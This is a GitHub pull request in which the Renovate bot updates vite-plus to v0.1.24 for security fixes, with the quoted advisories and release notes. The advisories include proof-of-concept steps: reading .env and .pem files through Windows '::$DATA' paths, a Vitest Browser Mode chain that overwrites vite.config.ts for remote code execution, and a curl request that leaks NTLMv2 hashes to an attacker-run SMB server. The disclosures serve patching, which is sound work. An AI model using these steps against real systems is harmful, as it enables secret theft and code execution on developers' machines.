
chore(deps): update dependency vite-plus to v0.1.24 [security]#30

Merged: k35o merged 1 commit into main from renovate/npm-vite-plus-vulnerability on Jun 17, 2026

Conversation


@renovate renovate Bot commented Jun 17, 2026

Contributor

This PR contains the following updates:

Package: vite-plus (source)
Change: 0.1.22 → 0.1.24
(age and confidence badges omitted)

vite: server.fs.deny bypass on Windows alternate paths

CVE-2026-53571 / GHSA-fx2h-pf6j-xcff

More information

Details

Summary

The contents of files that are specified by server.fs.deny can be returned to the browser on Windows.

Impact

Only apps that match the following conditions are affected:

  • explicitly exposes the Vite dev server to the network (using --host or server.host config option)
  • the sensitive file exists in the allowed directories specified by server.fs.allow
  • either of:
    • the sensitive file exists in an NTFS volume
    • the dev server is running on Windows and the sensitive file exists in a volume on which 8.3 short name generation is enabled (it is enabled by default on system volumes)
Details

Vite’s dev server denies direct access to sensitive files through server.fs.deny, including entries such as .env, .env.*, and *.{crt,pem}. However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied.
Because of this, requests such as /.env::$DATA?raw are treated as allowed paths, while Windows resolves them to the original file's default data stream.

Similarly, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via those names.

PoC
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

Access via browser at http://localhost:5173/.env::$DATA?raw

Example expected result:

  • /.env::$DATA?raw returns the contents of .env
  • /tls.pem::$DATA?raw returns the contents of tls.pem

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Vitest Browser: Exposed Browser Mode API Can Proxy CDP and Overwrite Config Files, Leading to RCE

CVE-2026-53633 / GHSA-g8mr-85jm-7xhm

More information

Details

Summary

Vitest Browser Mode exposes a cdp() API that forwards raw Chrome DevTools Protocol (CDP) methods over the Vitest browser WebSocket RPC. CDP is not gated by browser.api.allowWrite, browser.api.allowExec, api.allowWrite, or api.allowExec.

As a result, disabling Browser Mode write and exec operations does not prevent a browser API client from using CDP to perform equivalent actions. In a verified reproduction with allowWrite: false and allowExec: false, CDP Page.setDownloadBehavior set the browser download directory to the project root, and CDP Runtime.evaluate downloaded a controlled vite.config.ts. Vitest reloaded the changed config and executed attacker-controlled Node.js code.

When the Browser Mode API is also exposed to the network, this becomes remotely exploitable because the generated browser runner page exposes the API token, active session id, project name, and project root path needed to connect to the browser WebSocket API and select the target download directory.

Impact

This affects Browser Mode projects using a CDP-capable provider, such as Playwright Chromium, when the browser API server is exposed to the network, for example with --browser.api.host=0.0.0.0.

In this mode Vitest warns that write and exec operations are disabled by default, but the generated browser runner page exposes enough metadata for a remote client to authenticate to the browser WebSocket API while an active session exists. This includes the browser API token, active session id, project name, and serialized test config including the project root path. The attacker can then call Vitest's CDP RPC and use Chrome's download controls to overwrite vite.config.ts in the project root. When Vitest reloads the changed config, attacker-controlled Node.js code executes on the host running Vitest.

The same exposed CDP bridge also allows direct browser-session JavaScript execution through Runtime.evaluate. A separate local probe showed that CDP can navigate the browser to a file:// URL and read rendered file contents, but the primary verified impact is config-file overwrite leading to RCE.

Reproduction

For a concrete reproduction, start Browser Mode in watch mode using the official Lit example:

pnpm dlx tiged vitest-dev/vitest/examples/lit vitest-poc
cd vitest-poc
pnpm install

Configure the Browser Mode API to listen on all interfaces while explicitly disabling write and exec operations:

import { playwright } from '@vitest/browser-playwright'
import { defineConfig } from 'vite'

export default defineConfig({
  test: {
    browser: {
      enabled: true,
      provider: playwright(),
      instances: [
        { browser: 'chromium' },
      ],
      api: {
        host: '0.0.0.0',
        allowWrite: false,
        allowExec: false,
      },
    },
  },
})

Then start the test server:

pnpm test

Vitest serves the browser runner HTML and WebSocket API at http://localhost:63315.

While the browser session is active:

  1. Fetch the generated browser runner page:

    http://localhost:63315/__vitest_test__/
    
  2. Extract the embedded browser API token, active session id, project name, and project root:

    • window.VITEST_API_TOKEN
    • __vitest_browser_runner__.sessionId
    • __vitest_browser_runner__.config.name
    • __vitest_browser_runner__.config.root
  3. Connect to the browser API WebSocket as a tester client:

    /__vitest_browser_api__?type=tester&rpcId=<fresh-id>&sessionId=<session-id>&projectName=<project-name>&method=none&token=<token>
    
  4. Call the sendCdpEvent RPC method with:

    Page.setDownloadBehavior({
      behavior: "allow",
      downloadPath: __vitest_browser_runner__.config.root
    })
    
  5. Call sendCdpEvent again with Runtime.evaluate. The evaluated JavaScript creates a Blob containing a malicious Vite config and clicks an anchor element <a download="vite.config.ts">.

  6. Observed result:

    • vite.config.ts is overwritten with attacker-controlled content.
    • Vitest reloads the changed config.
    • The injected Node.js payload runs on the host.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows

CVE-2026-53632 / GHSA-v6wh-96g9-6wx3

More information

Details

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Impact

If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:

  • using Windows
  • NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
  • the user accesses the attacker's website, which sends a request to a middleware using launch-editor
  • the server that has the middleware using launch-editor is running
  • the attacker knows the URL for that server and the middleware

This would be a problem if the user's password is so simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path, the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.

The attacker could target a developer that uses a development server using launch-editor to develop code locally, send them a link and grab their NTLMv2 hash.

PoC

From the attacker side, we will set up an SMB server. I personally used Impacket's smbserver.py, but you could use something like Responder for this as well. To keep it simple, we will use smbserver.py here.

First, let's create a directory to serve as an SMB share.

mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt

Then, start the SMB server.

$ sudo smbserver.py -smb2support -debug share /tmp/data

Now, run any project that uses the launch-editor package. I have set up a simple "Hello world" project that uses Vite to do this. Then run the project locally (vite).

Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use curl to achieve the same.

curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'

Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.


Severity

  • CVSS Score: 5.5 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

voidzero-dev/vite-plus (vite-plus)

v0.1.24: vite-plus v0.1.24

Compare Source

A new vp pm stage publishing workflow, hardened installs and upgrades, a Node-version mismatch reinstall prompt, and the bundled vite/vitest/tsdown stack moves forward.

Features
  • vp pm stage: a new vp pm subcommand exposing npm's staged-publishing workflow (upload a build to a staging area without 2FA, then approve or reject it from a trusted device); it maps to pnpm stage / npm stage / yarn npm ... --staged per package manager, with an npm fallback for yarn Classic and bun (#1715), by @fengmk2
  • vp: prompt to reinstall when up-to-date global packages were built against a different Node.js than the active one (defaults to no); adds --reinstall-node-mismatch and --ignore-node-mismatch, and skips the prompt in CI (#1666), by @liangmiQwQ
  • vp format: add format as a visible alias of vp fmt, so the common slip vp format resolves correctly and vp format --init / --migrate apply the same vite.config.ts wiring as vp fmt (#1727), by @semimikoh
Fixes & Enhancements
  • vp install / Node runtime download: HTTP retries now wrap the whole body stream, hash verification, and archive extraction (not just the request headers), so truncated or corrupt downloads of package managers and Node are re-fetched instead of failing on the first attempt (#1719), by @fengmk2
  • vp upgrade --force on Windows: install into a fresh directory before repointing current, so the forced reinstall no longer fails trying to overwrite the running vp.exe (#1714), by @fengmk2
  • vp install -g: install global packages directly into their final prefix instead of a temp dir that gets moved, so packages whose postinstall scripts bake in absolute or relative temp paths still resolve their bins; a failed package in a multi-package install no longer removes the shims of the ones that already succeeded (#1698), by @liangmiQwQ
  • vp why: remove the -g / --global flag, which delegated to the package manager's global mode and ignored Vite+-managed global packages; vp why stays project-scoped while vp outdated -g keeps using the managed global flow (#1720), by @liangmiQwQ
  • Windows installer: remove the existing current link via PowerShell (detecting junctions, symlinks, and stale directories) instead of cmd /c rmdir, which could fail with "The directory is not empty" (#1726), by @TheAlexLichter
  • vp create: skip editor-config detection and package-local editor settings by default when creating a project inside an existing monorepo; --editor <name> stays an explicit opt-in and --no-editor an opt-out (#1729), by @jong-kyung
  • vp create vite:monorepo (pnpm): keep the aliased vite/vitest in the website app's package.json so the workspace overrides.vite: catalog: has a direct consumer and vp why vite resolves to @voidzero-dev/vite-plus-core; npm/yarn/bun still drop the dead-weight keys (#1728), by @fengmk2
  • vp pack: rewrite direct createRequire(...)("picomatch") calls in bundled tsdown output to the local bundled CJS entry, so packing no longer depends on an undeclared runtime picomatch under pnpm hoist: false (#1732), by @fengmk2
  • vp migrate: resolve a catalog: husky pin from the workspace catalog (pnpm-workspace.yaml, .yarnrc.yml, or package.json catalogs) during the git-hooks preflight, so a compatible catalog-pinned husky no longer triggers a false "could not determine husky version" warning and skips hook setup (#1710), by @fengmk2
Docs
  • Add a Copy Prompt button to the docs site that copies an AI-friendly getting-started prompt (intro, llms-full.txt pointer, install commands, and core vp commands) for handing straight to a coding agent (#1706), by @fengmk2
  • Update troubleshooting.md: vite.config.ts related issues are resolved by updating oxlint and oxfmt (#1708), by @leaysgur
  • Clarify the product and repository documentation locations and the new Run guide/config paths in AGENTS.md (#1707), by @leaysgur
Chore
  • vp install: reduce retained vp versions from 5 to 3 across the installer, vp upgrade, and the shell/PowerShell bootstrap scripts (active and previous versions stay protected for rollback); document the 3-version retention and vp upgrade --rollback (#1716), by @fengmk2
  • Exclude the snap-tests directory from Vitest config discovery so the VS Code Vitest extension stops generating a stray .vitest-plugin-loaded file (#1723), by @liangmiQwQ
  • Refresh trusted stack stats on the docs homepage (#1734), by @voidzero-guard[bot]
  • Update @wan9chi's GitHub handle (formerly branchseer) (#1705), by @wan9chi
  • Update GitHub Actions (#1724, #1730), by @renovate[bot]
  • Upgrade upstream dependencies: vite 8.0.14 → 8.0.16, vitest 4.1.7 → 4.1.8, tsdown 0.22.0 → 0.22.1, @vitejs/devtools 0.2.0 → 0.3.1 (#1713, #1735, #1737), by @voidzero-guard[bot]
Bundled Versions
Tool Version Source
vite 8.0.16 f94df87
rolldown 1.0.3 a287faa
tsdown 0.22.1 npm
vitest 4.1.8 npm
oxlint 1.67.0 npm
oxlint-tsgolint 0.23.0 npm
oxfmt 0.52.0 npm
New Contributors

Welcome to our new contributor @semimikoh! 🎉

Full Changelog: voidzero-dev/vite-plus@v0.1.23...v0.1.24

Published Packages
  • @voidzero-dev/vite-plus-core@0.1.24
  • @voidzero-dev/vite-plus-test@0.1.24
  • vite-plus@0.1.24
Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Or download and run vp-setup.exe from the assets below.

Upgrade:

vp upgrade

v0.1.23: vite-plus v0.1.23

Compare Source

Enterprise-ready HTTP (proxy + custom CA), task command shorthands in vite.config.ts, a smoother vp create/vp migrate, and the oxc/vite/rolldown bundled stack moves forward.

Highlights
  • Proxy and custom-CA aware HTTP: a new process-wide vite_shared::shared_http_client() honors HTTPS_PROXY / HTTP_PROXY / NO_PROXY, picks up macOS System Settings / Windows registry proxies, loads custom CAs from SSL_CERT_FILE and NODE_EXTRA_CA_CERTS, and exposes a VP_INSECURE_TLS diagnostic switch; makes vp work through Socket Firewall Free and other TLS-intercepting proxies (#1686), by @fengmk2
  • Task command shorthands: run.tasks entries in vite.config.ts now accept a bare string ("build": "cmd") or array ("build": ["cmd1", "cmd2"]) instead of always requiring { command: ... }; arrays reuse the existing && planning path so cache, dependsOn, and task options stay consistent (vite-task#391), by @jong-kyung
  • Managed vp outdated -g: routes through Vite+'s managed global package metadata instead of delegating to the underlying npm outdated -g store, so all installed global packages are reported consistently (#1659), by @liangmiQwQ
Features
  • vp pm approve-builds: new unified subcommand that mirrors pnpm approve-builds one-to-one, adapts to bun pm trust, and warns-and-noops on npm/yarn (#1662), by @fengmk2
  • vp create: opt-in GitHub Copilot setup; selecting --agent copilot now generates a .github/workflows/copilot-setup-steps.yml so the Copilot Coding Agent can set up Vite+ and run vp in the new project out of the box (#1683), by @jong-kyung
  • vp migrate: prompt to remove baseUrl from tsconfig.json before applying type-aware lint defaults (runs @andrewbranch/ts5to6 --fixBaseUrl . under the hood; auto-applied in non-interactive mode) (#1692), by @TheAlexLichter
  • Respect packageManager in package-manager shims (npm/npx, pnpm/pnpx, yarn/yarnpkg, bun/bunx); add non-mutating packageManager resolution metadata for vp env current and vp env which (#1654), by @fengmk2
  • vite-task: --filter no-match now exits 0 by default; add --fail-if-no-match to opt back in (vite-task#393), by @kazupon
Fixes & Enhancements
  • vp create: keep generated .vscode/settings.json trackable when the VS Code editor option is selected (avoid templates' .vscode/* .gitignore masking it) (#1700), by @jong-kyung
  • vp create vite:monorepo: normalize sub-package vite-plus to catalog: even when only vite-plus (not vite/vitest/...) is present, and drop the vite/vitest aliases generated by the upstream library template (#1697), by @fengmk2
  • vp add/install -g <path>: resolve the real package name from package.json instead of using the path string, so local-path installs don't create broken directories (#1685), by @liangmiQwQ
  • vp test --coverage and other direct built-in commands now expose the workspace's package.json#packageManager to child processes so tools like Vitest coverage can spawn the configured PM (#1696), by @jong-kyung
  • vp migrate: clean up the whole ESLint ecosystem (plugins, configs, parser/resolver, type-utils) rather than just eslint; skip the migration entirely when @nuxt/eslint is detected (#1682), by @fengmk2
  • vp create: write fmt.configPath (not configPath) for Zed oxfmt settings to match the official Zed OXC extension layout (#1687), by @chungweileong94
  • vp migrate: parse tsconfig.json as JSONC so files with comments don't break baseUrl detection/removal (#1688), by @TheAlexLichter
  • vp env setup: Unix env shims now point at the active vp executable instead of always assuming VP_HOME/current/bin/vp, so Homebrew-style installs work (#1631), by @leohara
  • vp outdated -g / vp why -g: don't require a local package.json; global commands run regardless of cwd (#1622), by @liangmiQwQ
  • vp create: default the "Initialize a git repository?" prompt to yes (#1650), by @fengmk2
  • vp hooks: include the managed Node bin in PATH so ./node_modules/.bin/vp can find node from a VS Code commit on macOS (#1647), by @TheAlexLichter
  • vpx on Windows now invokes the package's .cmd shim instead of the Unix binary (#1652), by @tobynguyen27
  • vite-task: bump cache database schema to version 13 (forces a one-time rebuild of the local task cache) (vite-task#402), by @branchseer
  • Bump vite-task to d02b257 and 5833b374; also bumps the repo's Rust nightly toolchain to nightly-2026-05-24 and ships the regenerated run config types and docs for the new task command shorthand (#1689, #1695), by @branchseer
Refactor
  • Replace VP_SHELL_NU/VP_SHELL_PWSH with a single VP_SHELL override; add explicit shell parsing for bash, zsh, fish, nu, pwsh, and cmd, and harden auto-detection against nested shells (#1658), by @nekomoyi
  • vite-task: replace allocator-api2 with bumpalo collections (vite-task#400), by @branchseer
  • vite-task: drop the unused and_item_index field from ExecutionItemDisplay (vite-task#394), by @branchseer
Docs
  • Add the root AGENTS.md as the primary AI-agent guide for the vite-plus repository; convert CLAUDE.md into a compatibility pointer (#1670), by @jong-kyung
  • Align the agent validation table to match AGENTS.md (#1673), by @jong-kyung
  • Update the task output caching guide so the documented behavior matches what vite-task actually does (#1639), by @ericclemmons
  • Correct the bundled-source location in packages/core/BUNDLING.md (#1660), by @shulaoda
Chore
  • Clarify --help text for vp env default/pin/use/exec with Examples: blocks (#1664), by @Boshen
  • Refresh trusted stack stats on the docs homepage (#1680), by @voidzero-guard[bot]
  • Drop the standalone pnpm --filter @rolldown/pluginutils build step now that @rolldown/pluginutils is published from its own package (#1655), by @shulaoda
  • Preserve single-quote style when sync-remote rewrites pnpm-workspace.yaml (#1672), by @lyzno1
  • Enable vite_pm_cli lib tests by removing a stale test = false flag (#1661), by @shulaoda
  • CI: switch macOS runners back to namespace-profile-mac-default (#1701), by @fengmk2
  • CI: fix release-day flakes in the upgrade test and snap test when the dev package.json version equals npm latest (#1645), by @fengmk2
  • CI: replace zizmor and cargo-deny workflows with oxc-project/security-action (#1635), by @Boshen
  • CI: warm-up monorepo cache test under npm (#1649), by @fengmk2
  • CI: attach per-target vp binary archives (.tar.gz/.zip) to GitHub Releases alongside the existing vp-setup-*.exe installers (#1665), by @Boshen
  • CI: declare Playwright via repo.json in ecosystem tests and bump consumers to >=1.60 to dodge the Node 24.16.0 hang (#1668), by @fengmk2
  • Update GitHub Actions (#1640, #1675, #1678, #1679, #1691), by @renovate[bot]
  • Upgrade upstream dependencies: vite 8.0.11 → 8.0.14, rolldown 1.0.0 → 1.0.3, vitest 4.1.6 → 4.1.7, oxlint 1.63.0 → 1.67.0, oxfmt 0.48.0 → 0.52.0, oxlint-tsgolint 0.22.1 → 0.23.0, @oxc-project/* and oxc Rust crates 0.129.0 → 0.133.0 (#1646, #1653, #1693, #1699), by @voidzero-guard[bot]
Bundled Versions
Tool Version Source
vite 8.0.14 c917f1e
rolldown 1.0.3 a287faa
tsdown 0.22.0 npm
vitest 4.1.7 npm
oxlint 1.67.0 npm
oxlint-tsgolint 0.23.0 npm
oxfmt 0.52.0 npm
New Contributors

Welcome to all new contributors! 🎉

@ericclemmons, @tobynguyen27, @shulaoda, @leohara, @chungweileong94

Full Changelog: voidzero-dev/vite-plus@v0.1.22...v0.1.23

Published Packages
  • @voidzero-dev/vite-plus-core@0.1.23
  • @voidzero-dev/vite-plus-test@0.1.23
  • vite-plus@0.1.23
Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Or download and run vp-setup.exe from the assets below.

Upgrade:

vp upgrade

Configuration

📅 Schedule: (in timezone Asia/Tokyo)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot requested a review from k35o as a code owner June 17, 2026 02:49
@renovate renovate Bot added the security label Jun 17, 2026
@renovate renovate Bot force-pushed the renovate/npm-vite-plus-vulnerability branch from 2565d1e to ae9e0ea June 17, 2026 04:51
@github-actions

Contributor

🔍 Preset previews

You can review the effective rules of each lint preset in the browser → Open the list

preset preview
backend backend.html
base base.html
nextjs nextjs.html
react react.html
tailwind tailwind.html
test test.html
typescript typescript.html

This is the latest preview for this PR's branch. It is updated on every push.

@k35o k35o merged commit ed6b695 into main Jun 17, 2026
4 checks passed
@k35o k35o deleted the renovate/npm-vite-plus-vulnerability branch June 17, 2026 05:26